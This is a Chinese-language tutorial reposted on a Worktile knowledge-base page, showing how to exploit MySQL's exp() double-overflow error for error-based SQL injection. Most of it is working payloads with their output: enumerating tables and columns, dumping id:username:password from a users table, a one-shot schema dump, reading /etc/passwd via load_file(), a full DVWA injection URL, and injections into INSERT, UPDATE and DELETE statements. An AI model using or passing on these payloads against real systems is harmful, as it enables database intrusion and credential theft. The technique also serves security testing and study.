投稿
  1. Worktile社区首页
  2. 其他

如何使用exp进行SQL报错注入

亿速云 其他 阅读 299

0x01 前言概述

小编又在MySQL中发现了一个Double型数据溢出。当我们拿到MySQL里的函数时,小编比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以小编就跑去测试看哪些函数会出现溢出错误。然后小编发现,当传递一个大于709的值时,函数exp()就会引起一个溢出错误。

如何使用exp进行SQL报错注入

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

在MySQL中,exp与ln和log的功能相反,简单介绍下,就是log和ln都返回以e为底数的对数,见等式:

如何使用exp进行SQL报错注入
如何使用exp进行SQL报错注入

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

指数函数为对数函数的反函数,exp()即为以e为底的对数函数,如等式:

如何使用exp进行SQL报错注入

mysql> select exp(2.70805020110221);+-----------------------+| exp(2.70805020110221) |+-----------------------+|                    15 |+-----------------------+1 row in set (0.00 sec)

0x02 注入

当涉及到注入时,我们使用否定查询来造成“DOUBLE value is out of range”的错误。作者之前的博文提到的,将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到***的无符号BIGINT值。

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)

mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。

>`exp(~(select*from(select user())x))`       mysql> select exp(~(select*from(select user())x));      ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x03 注出数据

得到表名:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

得到列名:

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

检索数据:

select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));

0x04 一蹴而就

这个查询可以从当前的上下文中dump出所有的tables与columns。我们也可以dump出所有的数据库,但由于我们是通过一个错误进行提取,它会返回很少的结果。

exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))   http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#

如何使用exp进行SQL报错注入

0x05 读取文件

你可以通过load_file()函数来读取文件,但作者发现有13行的限制,该语句也可以在BIGINT overflow injections中使用。

select exp(~(select*from(select load_file('/etc/passwd'))a));

如何使用exp进行SQL报错注入

注意,你无法写文件,因为这个错入写入的只是0。

mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt';  ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'       # type C:out.txt  0

0x06 Injection in Insert

按部就班就好

mysql> insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'Eyre');  ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

对于所有的insert,update和delete语句DIOS查询也同样可以使用。

mysql> insert into users (id, username, password) values (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre');  ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000  newdb::users::id  newdb::users::username  newdb::users::password' from dual)))'

0x07 Injection in Update

mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4;  ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

0x08 Injection in Delete

mysql> delete from users where id='1' | exp(~(select*from(select user())x));  ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

和前面的BIGINT注入一样,exp注入也适用于MySQL5.5.5及以上版本。以前的版本对于此情况则是“一言不发”。

mysql> select version();  +---------------------+  | version()           |  +---------------------+  | 5.0.45-community-nt |  +---------------------+  1 row in set (0.00 sec)     mysql> select exp(710);  +----------+  | exp(710) |  +----------+  |   1.#INF |  +----------+  1 row in set (0.00 sec)     mysql> select exp(~0);  +---------+  | exp(~0) |  +---------+  |  1.#INF |  +---------+  1 row in set (0.00 sec)

可能还有其他的函数会产生这种报错呦。

以上是“如何使用exp进行SQL报错注入”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注亿速云行业资讯频道!

文章标题:如何使用exp进行SQL报错注入,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/23240

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云亿速云认证作者
0 0
上一篇 2022年9月6日 上午12:18
下一篇 2022年9月6日 上午12:20

相关推荐

  • Web.config在渗透中的作用是什么 其他

    Web.config在渗透中的作用是什么

    前言  下面主要介绍web.config文件在渗透中的作用,即可上传一个web.config时的思路,话不多说,开始正题。首先我们来看一下web.config是什么,援引百度百科的介绍:  Web.config文件是一个XML文本文件,它用来储存ASP.NETWeb 应用程序的配置信息,它可以出现在…

    亿速云 亿速云
    2022年9月24日
    10700
  • git如何解决合并冲突 其他

    git如何解决合并冲突

    本篇文章“git如何解决合并冲突”主要为您从以下几个方面讲解:原因、解决方法、git冲突、解决冲突,希望对您有所启发。 git解决合并冲突的方法:1、编辑有冲突的文件,并删除文件中的特殊符号,根据需求修改代码;2、将指定文件添加到暂存区,并将指定的分支提交到主干,执行提交即可,其中使用“git co…

    亿速云 亿速云
    2022年6月29日
    55800
  • mybatisplus雪花算法生成Id怎么使用 其他

    mybatisplus雪花算法生成Id怎么使用

    雪花算法实战 1.建表 DROP TABLE IF EXISTS user;CREATE TABLE user( id BIGINT(20) NOT NULL COMMENT ‘主键ID’, name VARCHAR(30) NULL DEFAULT NULL COMMENT ‘姓名’, age I…

    亿速云 亿速云
    2022年9月21日
    23800
  • Swift的Mirror反射怎么使用 其他

    Swift的Mirror反射怎么使用

    元类型与.self AnyObject 在Swift开发中,我们经常会使用AnyObject来代表任意类的实例、类的类型、以及仅类遵守的协议。 代表任意类的实例、类的类型 class LGTeacher { var age = 18}var t = LGTeacher()var t1: AnyObj…

    亿速云 亿速云
    2022年9月24日
    22100
  • windows驱动精灵启动鼠标不动如何解决 其他

    windows驱动精灵启动鼠标不动如何解决

    驱动精灵启动鼠标不动: 答:这是最新版的驱动精灵的bug。 这样的情况和电脑没有关系,是软件版本更新后造成的bug。 解决方法: 1、启动驱动精灵后,尝试拔出鼠标的USB接口,然后重新插入连接。 鼠标即可继续恢复正常使用。 2、强制重启电脑,重启时拔掉鼠标usb插口。 开机后再次插入连接即可。 驱动…

    亿速云 亿速云
    2022年9月13日
    10200
  • Java怎么通过动态代理实现一个简单的拦截器操作 其他

    Java怎么通过动态代理实现一个简单的拦截器操作

    一、代理 在使用动态代理实现拦截器之前我们先简单了解一下什么Java的代理。 代理,顾名思义,就是不直接操作被代理(下面都用目标对象称呼,听起来舒服一些)对象,而是通过一个代理对象去间接的使用目标对象中的方法。代理分为两种模式,一种是静态代理,一种是动态代理。接下来先写一个静态代理的例子。 无论是静…

    亿速云 亿速云
    2022年8月27日
    11500
  • windows steam错误代码105如何解决 其他

    windows steam错误代码105如何解决

    steam错误代码105解决方法: 1、首先打开steam设置,然后点击左侧的“网页浏览器”。 2、然后选择“删除网页浏览器缓存”,再点击“删除所有浏览器cookie”。 3、右击右下角网络,点击属性然后进入网络选项,双击“Internet协议版本4”。 4、随后可以进入dns修改界面,此时可以设置…

    亿速云 亿速云
    2022年8月31日
    27700
  • 如何用transition实现短视频APP的点赞动画 其他

    如何用transition实现短视频APP的点赞动画

    实现不同表情的不断上升 如果使用纯 CSS 实现这一整套动画的话。我们首先需要实现一段无限循环的,大量不同的表情不断向上漂浮的动画。 像是这样: 这个整体还是比较容易实现的,核心原理就是同一个动画,设置不同的 transition-duration,transition-dalay,和一定范围内的旋…

    亿速云 亿速云
    2022年9月8日
    9400
  • 电脑msr分区可不可以删除 其他

    电脑msr分区可不可以删除

    msr分区可以删除;msr分区是“Microsoft Reserved Partition”的缩写,是作为保留分区来使用,系统组件可以将MSR分区的部分分配到新的分区以供使用,msr分区不是必须的,可以被删除。 本教程操作环境:windows10系统、DELL G3电脑。 msr分区可以删除 MSR…

    亿速云 亿速云
    2022年9月16日
    87500
  • vlookup函数的概念是什么 其他

    vlookup函数的概念是什么

    vlookup函数是什么意思 答:纵向查找函数。 1、vlookup函数能够快速导入列表数据,完成数据核对或查找。 2、在工作中,我们可以使用它在单个或多个表格中查找并核对需要的数据。 3、vlookup函数的语法规则为:VLOOKUP(lookup_value,table_array,col_in…

    亿速云 亿速云
    2022年9月24日
    7900
联系我们
站长微信
站长微信
分享本页
返回顶部
PingCode 比 Jira 更好用的研发管理工具。免费试用                        《2022敏捷白皮书》下载